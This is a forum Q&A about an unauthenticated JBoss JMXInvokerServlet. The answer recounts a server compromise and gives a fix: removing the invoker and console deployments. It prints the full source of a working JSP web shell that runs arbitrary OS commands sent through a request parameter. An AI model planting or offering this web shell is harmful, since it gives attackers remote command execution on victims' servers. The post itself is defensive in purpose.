# Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) marshalled object remote code execution

Tags: java, tomcat, jboss

During our testing, we performed vulnerability scans and identified a Jboss server that did not require authentication to the JMXInvokerSerlet. 
I am not getting the problem exactly .whether it is Jboss problem or servlet?

If any one can help me please tell me the Solution .

what is problem and is any solution for that?
Thank you in advance

Answer (score 0):

I've been recently hit by that problem on my VPS.

I had a JBoss installation (version 4.2.3) which had the web-console and invoker accessible to anyone. What happened was that someone took advantage of this [JBoss Vulnerability](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27126) and used an existing [exploit](http://www.exploit-db.com/exploits/28713/) to insert a JSP web shell in my Jboss instalation.

The JSP Web Shell is basically something like this:

```
    <%@ page import="java.util.*,java.io.*"%>
    <%
    String cmd;
    String[] cmdarr;
    String OS = System.getProperty("os.name");
    if (request.getParameter("cmd") != null) {
        cmd = new String (request.getParameter("cmd"));
      if (OS.startsWith("Windows")) {
       cmdarr = new String [] {"cmd", "/C", cmd};
      }
      else {
       cmdarr = new String [] {"/bin/sh", "-c", cmd};
      }
      Process p = Runtime.getRuntime().exec(cmdarr);
      OutputStream os = p.getOutputStream();
      InputStream in = p.getInputStream();
      DataInputStream dis = new DataInputStream(in);
      String disr = dis.readLine();
      while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
      }
    }
%>
```

Which allows an attacker to basically execute OS commands right from the browser. In my case, my VPS was being used to mine bitcoin, after a wget to fetch a Perl script that seemed to be like another type of console.

Lesson learned the hard way :( So if you still haven't done anything, please do.

I simply removed the deployment of the HttpInvoker and the WebConsole/JMX-Console, because I don't need them. You can also see [how to secure the WebConsole](https://community.jboss.org/thread/144889), [this link also provides a better explanation](http://blog.imperva.com/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection.html) than I did.

Hope that helps!